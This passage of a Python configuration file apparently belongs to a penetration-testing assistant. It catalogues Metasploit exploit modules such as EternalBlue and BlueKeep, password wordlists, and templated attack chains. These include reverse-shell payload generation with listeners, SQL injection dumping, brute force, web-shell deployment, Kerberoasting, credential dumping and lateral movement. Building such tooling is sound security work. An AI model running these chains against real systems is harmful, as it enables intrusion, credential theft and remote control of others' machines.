    MetasploitModule("windows/smb/ms17_010_eternalblue", "exploit/windows/smb/ms17_010_eternalblue", "EternalBlue SMB RCE (MS17-010)", "windows", {"RHOSTS": "Target", "LHOST": "Attacker", "LPORT": "4444"}, "windows/x64/meterpreter/reverse_tcp"),
    MetasploitModule("windows/smb/ms08_067_netapi", "exploit/windows/smb/ms08_067_netapi", "MS08-067 NetAPI RCE", "windows", {"RHOSTS": "Target"}, "windows/meterpreter/reverse_tcp"),
    MetasploitModule("windows/smb/psexec", "exploit/windows/smb/psexec", "SMB PsExec (lateral movement)", "windows", {"RHOSTS": "Target", "SMBUser": "Username", "SMBPass": "Password"}, "windows/meterpreter/reverse_tcp"),
    MetasploitModule("windows/rdp/cve_2019_0708_bluekeep_rce", "exploit/windows/rdp/cve_2019_0708_bluekeep_rce", "BlueKeep RDP RCE (CVE-2019-0708)", "windows", {"RHOSTS": "Target"}, "windows/x64/meterpreter/reverse_tcp"),
    MetasploitModule("windows/http/rejetto_hfs_exec", "exploit/windows/http/rejetto_hfs_exec", "Rejetto HFS 2.3.x RCE", "windows", {"RHOSTS": "Target"}, "windows/meterpreter/reverse_tcp"),
    MetasploitModule("windows/ssh/putty_double_agent", "exploit/windows/ssh/putty_double_agent", "PuTTY Double Agent", "windows", {"RHOSTS": "Target"}),
    # Linux Exploits
    MetasploitModule("linux/samba/is_known_pipename", "exploit/linux/samba/is_known_pipename", "Samba is_known_pipename RCE", "linux", {"RHOSTS": "Target"}, "linux/x64/meterpreter/reverse_tcp"),
    MetasploitModule("linux/http/apache_mod_cgi_bash_env_exec", "exploit/linux/http/apache_mod_cgi_bash_env_exec", "Shellshock Apache mod_cgi", "linux", {"RHOSTS": "Target", "URIPATH": "/cgi-bin/test.cgi"}, "linux/x64/meterpreter/reverse_tcp"),
    # Multi-platform
    MetasploitModule("multi/http/tomcat_mgr_upload", "exploit/multi/http/tomcat_mgr_upload", "Apache Tomcat Manager Upload", "multi", {"RHOSTS": "Target", "TomcatMgrUser": "username", "TomcatMgrPass": "password"}, "java/jsp_shell_reverse_tcp"),
    MetasploitModule("multi/http/axis2_deployer", "exploit/multi/http/axis2_deployer", "Apache Axis2 Deployer", "multi", {"RHOSTS": "Target"}, "java/jsp_shell_reverse_tcp"),
    # Auxiliary Scanners
    MetasploitModule("scanner/smb/smb_ms17_010", "auxiliary/scanner/smb/smb_ms17_010", "MS17-010 Scanner", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/smb/smb_version", "auxiliary/scanner/smb/smb_version", "SMB Version Scanner", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/ssh/ssh_version", "auxiliary/scanner/ssh/ssh_version", "SSH Version Scanner", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/http/http_version", "auxiliary/scanner/http/http_version", "HTTP Version Scanner", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/mysql/mysql_version", "auxiliary/scanner/mysql/mysql_version", "MySQL Version Scanner", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/snmp/snmp_login", "auxiliary/scanner/snmp/snmp_login", "SNMP Community Login", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/ftp/anonymous", "auxiliary/scanner/ftp/anonymous", "Anonymous FTP Scanner", "multi", {"RHOSTS": "Target range"}),
    MetasploitModule("scanner/smb/smb_login", "auxiliary/scanner/smb/smb_login", "SMB Login Scanner", "multi", {"RHOSTS": "Target range", "SMBUser": "Username", "SMBPass": "Password"}),
    # Post Exploitation
    MetasploitModule("post/multi/recon/local_exploit_suggester", "post/multi/recon/local_exploit_suggester", "Local Exploit Suggester", "multi", {"SESSION": "Meterpreter session"}),
    MetasploitModule("post/linux/gather/enum_configs", "post/linux/gather/enum_configs", "Linux Config Enumeration", "linux", {"SESSION": "Meterpreter session"}),
    MetasploitModule("post/linux/gather/hashdump", "post/linux/gather/hashdump", "Linux Password Dump", "linux", {"SESSION": "Meterpreter session"}),
    MetasploitModule("post/windows/gather/smart_hashdump", "post/windows/gather/smart_hashdump", "Windows Hash Dump", "windows", {"SESSION": "Meterpreter session"}),
    MetasploitModule("post/windows/gather/enum_applications", "post/windows/gather/enum_applications", "Windows App Enumeration", "windows", {"SESSION": "Meterpreter session"}),
    MetasploitModule("post/multi/manage/shell_to_meterpreter", "post/multi/manage/shell_to_meterpreter", "Shell to Meterpreter Upgrade", "multi", {"SESSION": "Shell session", "LHOST": "Attacker", "LPORT": "4444"}),
]

# ═══════════════════════════════════════════════════════════════════════════
# WORDLISTS
# ═══════════════════════════════════════════════════════════════════════════

WORDLISTS = [
    Wordlist("rockyou", "/usr/share/wordlists/rockyou.txt", "Default password wordlist (14 million passwords)", "~14M", ["password cracking", "brute force"]),
    Wordlist("dirb-common", "/usr/share/wordlists/dirb/common.txt", "Common web directories", "~4.6K", ["directory brute force", "web content discovery"]),
    Wordlist("dirbuster-medium", "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt", "Medium web directories", "~220K", ["directory brute force"]),
    Wordlist("seclists-passwords", "/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt", "Top 10K most common passwords", "10K", ["password cracking"]),
    Wordlist("seclists-usernames", "/usr/share/seclists/Usernames/top-usernames-shortlist.txt", "Top usernames", "~1K", ["user enumeration", "brute force"]),
    Wordlist("seclists-subdomains", "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt", "Top 5K subdomains", "5K", ["subdomain brute force"]),
    Wordlist("seclists-web-content", "/usr/share/seclists/Discovery/Web-Content/common.txt", "Common web content paths", "~4.6K", ["web content discovery"]),
    Wordlist("seclists-web-content-big", "/usr/share/seclists/Discovery/Web-Content/big.txt", "Large web content paths", "~20K", ["web content discovery"]),
    Wordlist("seclists-web-content-raft", "/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt", "Raft medium directories", "~62K", ["web content discovery"]),
    Wordlist("dns", "/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt", "Top 20K subdomains", "20K", ["DNS brute force"]),
    Wordlist("snmp", "/usr/share/seclists/Discovery/SNMP/snmp.txt", "SNMP community strings", "~16K", ["SNMP brute force"]),
]

# ═══════════════════════════════════════════════════════════════════════════
# TOOL COMBINATIONS (Workflows)
# ═══════════════════════════════════════════════════════════════════════════

TOOL_COMBINATIONS = {
    "web_recon": {
        "description": "Full web reconnaissance pipeline",
        "steps": [
            "subfinder -d {target} -o subs.txt",
            "httpx -l subs.txt -sc -title -tech-detect -o alive.txt",
            "nuclei -l alive.txt -severity critical,high -o vulns.txt",
            "ffuf -u https://FUZZ.{target} -w /usr/share/wordlists/dirb/common.txt -o dirs.txt",
            "nikto -h {target} -o nikto.txt",
        ],
        "tools": ["subfinder", "httpx", "nuclei", "ffuf", "nikto"],
    },
    "sql_injection": {
        "description": "SQL injection attack chain",
        "steps": [
            "nmap -sV -p 80,443,8080 {target}",
            "ffuf -u https://{target}/FUZZ -w /usr/share/wordlists/dirb/common.txt",
            "sqlmap -u 'https://{target}/page?id=1' --batch --dbs",
            "sqlmap -u 'https://{target}/page?id=1' -D {db} --tables",
            "sqlmap -u 'https://{target}/page?id=1' -D {db} -T {table} --dump",
        ],
        "tools": ["nmap", "ffuf", "sqlmap"],
    },
    "credential_attack": {
        "description": "Credential brute force attack chain",
        "steps": [
            "nmap -sV -p 22,21,23,3389 {target}",
            "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://{target}",
            "hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://{target}",
            "medusa -h {target} -u admin -P /usr/share/wordlists/rockyou.txt -M ssh",
        ],
        "tools": ["nmap", "hydra", "medusa"],
    },
    "smb_attack": {
        "description": "SMB enumeration and attack chain",
        "steps": [
            "nmap -sV -p 445,139 {target}",
            "enum4linux-ng -A {target}",
            "smbclient -L //{target} -N",
            "crackmapexec smb {target} -u '' -p '' --shares",
            "nmap --script smb-vuln-ms17-010 -p 445 {target}",
        ],
        "tools": ["nmap", "enum4linux-ng", "smbclient", "crackmapexec"],
    },
    "reverse_shell": {
        "description": "Reverse shell attack chain",
        "steps": [
            "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT=4444 -f elf -o shell.elf",
            "nc -lvnp 4444",
            "python3 -m http.server 80",
            "msfconsole -q -x 'use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST {lhost}; run'",
        ],
        "tools": ["msfvenom", "nc", "msfconsole"],
    },
    "privilege_escalation_linux": {
        "description": "Linux privilege escalation",
        "steps": [
            "uname -a",
            "id && cat /etc/passwd",
            "find / -perm -4000 -type f 2>/dev/null",
            "cat /etc/crontab",
            "netstat -tlnp",
            "./linpeas.sh -s",
            "./linux-exploit-suggester.sh",
        ],
        "tools": ["linpeas", "linux-exploit-suggester"],
    },
    "privilege_escalation_windows": {
        "description": "Windows privilege escalation",
        "steps": [
            "systeminfo",
            "whoami /all",
            "net user",
            "netstat -ano",
            "reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated",
            "msfconsole -q -x 'use post/multi/recon/local_exploit_suggester; set SESSION 1; run'",
        ],
        "tools": ["crackmapexec", "mimikatz", "metasploit"],
    },
    "lateral_movement": {
        "description": "Network lateral movement",
        "steps": [
            "crackmapexec smb {cidr} -u {user} -p {pass} --shares",
            "crackmapexec smb {cidr} -u {user} -p {pass} --sam",
            "crackmapexec smb {cidr} -u {user} -p {pass} --lsa",
            "evil-winrm -i {host} -u {user} -p {pass}",
        ],
        "tools": ["crackmapexec", "evil-winrm"],
    },
    "wifi_attack": {
        "description": "WiFi attack chain",
        "steps": [
            "airmon-ng start wlan0",
            "airodump-ng wlan0mon",
            "airodump-ng -c {channel} --bssid {bssid} -w capture wlan0mon",
            "aireplay-ng -0 10 -a {bssid} -c {client} wlan0mon",
            "aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap",
        ],
        "tools": ["aircrack-ng"],
    },
    "memory_forensics": {
        "description": "Memory forensics workflow",
        "steps": [
            "vol -f dump.raw windows.pslist",
            "vol -f dump.raw windows.netscan",
            "vol -f dump.raw windows.hashdump",
            "vol -f dump.raw windows.malfind",
            "vol -f dump.raw windows.cmdline",
        ],
        "tools": ["volatility3"],
    },
    "steganography_analysis": {
        "description": "Steganography analysis workflow",
        "steps": [
            "exiftool image.png",
            "binwalk image.png",
            "strings image.png",
            "zsteg -a image.png",
            "steghide info image.png",
            "stegseek image.jpg /usr/share/wordlists/rockyou.txt",
        ],
        "tools": ["exiftool", "binwalk", "strings", "zsteg", "steghide", "stegseek"],
    },
    "ssl_tls_audit": {
        "description": "SSL/TLS security audit",
        "steps": [
            "sslscan target.com",
            "testssl target.com",
            "nmap --script ssl-enum-ciphers -p 443 target.com",
            "nmap --script ssl-heartbleed -p 443 target.com",
            "nmap --script ssl-poodle -p 443 target.com",
        ],
        "tools": ["sslscan", "testssl", "nmap"],
    },
    "snmp_attack": {
        "description": "SNMP attack chain",
        "steps": [
            "onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt {target}",
            "snmpwalk -v2c -c public {target}",
            "snmp-check -c public {target}",
            "msfconsole -q -x 'use auxiliary/scanner/snmp/snmp_login; set RHOSTS {target}; run'",
        ],
        "tools": ["onesixtyone", "snmpwalk", "snmp-check", "metasploit"],
    },
    "kerberos_attack": {
        "description": "Kerberos attack chain (Active Directory)",
        "steps": [
            "nmap -sV -p 88 {target}",
            "crackmapexec ldap {target} -u {user} -p {pass} --users --groups --kerberoast",
            "impacket-GetUserSPNs {target}/{user}:{pass} -request -outputfile hashes.txt",
            "hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt",
        ],
        "tools": ["crackmapexec", "hashcat"],
    },
    "webshell_deployment": {
        "description": "Web shell deployment chain",
        "steps": [
            "nmap -sV -p 80,443,8080 {target}",
            "ffuf -u https://{target}/FUZZ -w /usr/share/wordlists/dirb/common.txt -x php",
            "sqlmap -u 'https://{target}/page?id=1' --os-shell",
            "weevely generate {password} shell.php",
            "weevely https://{target}/uploads/shell.php {password}",
        ],
        "tools": ["nmap", "ffuf", "sqlmap", "weevely"],
    },
    "domain_enumeration": {
        "description": "Active Directory domain enumeration",
        "steps": [
            "nmap -sV -p 88,135,139,389,445,636 {target}",
            "enum4linux-ng -A {target}",
            "rpcclient -U '' -N {target}",
            "crackmapexec ldap {target} -u {user} -p {pass} --users --groups --computers --password-pol",
        ],
        "tools": ["nmap", "enum4linux-ng", "rpcclient", "crackmapexec"],
    },
    "cloud_recon": {
        "description": "Cloud infrastructure reconnaissance",
        "steps": [
            "cloud_enum -k {company}",
            "s3scanner scan -f buckets.txt",
            "pacu --module-name iam__enum_users_roles_policies_groups",
        ],
        "tools": ["cloud_enum", "s3scanner", "pacu"],
    },
    "kubernetes_attack": {
        "description": "Kubernetes cluster attack chain",
        "steps": [
            "kube-hunter --remote {target}",
            "kubeaudit all",
            "trivy image {image}",
            "kubectl get pods --all-namespaces",
            "kubectl exec -it {pod} -- /bin/sh",
        ],
        "tools": ["kube-hunter", "kubeaudit", "trivy"],
    },
    "mobile_analysis": {
        "description": "Android app security analysis",
        "steps": [
            "apktool d app.apk -o app_decoded",
            "jadx app.apk -o jadx_output",
            "grep -r 'api_key\\|secret\\|password' jadx_output/",
            "objection -g {package} explore",
            "frida -U -g {package} -l hook.js",
        ],
        "tools": ["apktool", "jadx", "objection", "frida"],
    },
    "active_directory_full": {
        "description": "Full Active Directory compromise chain",
        "steps": [
            "nmap -sV -p 88,135,139,389,445,636 {target}",
            "crackmapexec ldap {target} -u {user} -p {pass} --users --groups",
            "bloodhound-python -u {user} -p {pass} -d {domain} -c All -ns {dc_ip}",
            "kerbrute userenum --dc {dc} -d {domain} users.txt",
            "impacket-GetUserSPNs {domain}/{user}:{pass} -request -outputfile hashes.txt",
            "hashcat -m 13100 hashes.txt rockyou.txt",
            "impacket-secretsdump {domain}/{user}:{pass}@{target}",
        ],
        "tools": ["nmap", "crackmapexec", "bloodhound", "kerbrute", "impacket", "hashcat"],
    },
    "api_penetration": {
        "description": "REST API penetration testing",
        "steps": [
            "arjun -u https://{target}/api/v1/endpoint",
            "ffuf -u https://{target}/api/FUZZ -w api-routes.txt -mc 200",
            "kiterunner scan https://{target}/api -w routes-large.kite",
            "curl -X POST https://{target}/api/data -d '{\"test\":\"payload\"}' -H 'Content-Type: application/json'",
        ],
        "tools": ["arjun", "ffuf", "kiterunner", "curl"],
    },
    "firmware_analysis": {
        "description": "IoT firmware analysis workflow",
        "steps": [
            "binwalk firmware.bin",
            "binwalk -e firmware.bin",
            "unsquashfs squashfs-root.img",
            "find . -name '*.conf' -o -name '*.key' -o -name '*.pem'",
            "strings busybox | grep -i pass",
            "firmwalker.sh squashfs-root/",
        ],
        "tools": ["binwalk", "unsquashfs", "strings", "firmwalker"],
    },
}
